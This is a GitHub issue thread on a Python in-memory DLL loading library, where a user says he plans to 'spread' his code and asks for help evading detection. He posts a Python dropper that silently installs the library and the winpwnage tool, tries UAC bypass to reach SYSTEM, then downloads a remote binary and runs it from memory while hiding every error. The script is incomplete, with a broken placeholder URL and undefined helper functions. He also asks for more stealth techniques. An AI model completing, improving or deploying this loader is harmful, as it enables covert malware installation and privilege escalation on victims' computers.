search

naksyn / PythonMemoryModule

pure-python implementation of MemoryModule technique to load dll and unmanaged exe entirely from memory
Apache License 2.0
292 stars 45 forks source link

need help with a lil more stealth #3

Closed Mustwey closed 10 months ago

Mustwey commented 10 months ago

if i were to spread it, it would obv be flagged with anyone with a brain due to the lib's name, can u recommend ways of silently installing the lib directly through the code?

Mustwey commented 10 months ago

nvm, stupid issue, ignore pls

Mustwey commented 10 months ago

another question, what versions of python this shi support? 3.12

Mustwey commented 10 months ago

this is my payload so far, what do u recommend i add or fix? 

import sys
import subprocess
import os
import ctypes
import urllib.request

def silent_install(package):
    subprocess.check_call([sys.executable, "-m", "pip", "install", package],
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

def is_user_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

def download_and_execute(url):
    try:
        response = urllib.request.urlopen(url)
        data = response.read()
        import pythonmemorymodule
        module = pythonmemorymodule.MemoryModule(data=data, debug=False)
        entry_point = module.get_proc_addr('main')
        if entry_point:
            entry_point()
    except Exception:
        pass  # Fail silently

def run_as_admin(filepath, arguments=""):
    if not is_user_admin() or (information().admin() and not information().system()):
        try:
            scan_results = scanner(uac=True, persist=False, elevate=True).start()
            for method_type in ['uac', 'elevate']:
                if scan_results.get(method_type):
                    for method in scan_results[method_type]:
                        function(**{method_type: True}).run(id=str(method['id']), payload=[sys.executable, filepath] + arguments.split())
                        if information().system():
                            return  # Successfully elevated to SYSTEM
        except ImportError:
            pass  # Fail silently if winpwnage is not installed

        if not information().system() and not information().admin():
            ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, f"{filepath} {arguments}", None, 1)

def main():
    for lib in ["pythonmemorymodule", "winpwnage"]:
        try:
            __import__(lib)
        except ImportError:
            silent_install(lib)

    if not is_user_admin() and information().admin() and not information().system():
        run_as_admin(__file__)
        sys.exit(0)

    url = 'htt;sp//test'
    download_and_execute(url)

if __name__ == "__main__":
    main()
Mustwey commented 10 months ago

and are there any other methods i should apply like similar to this lib? for further stealth? im new to this i dont know anything so please recommend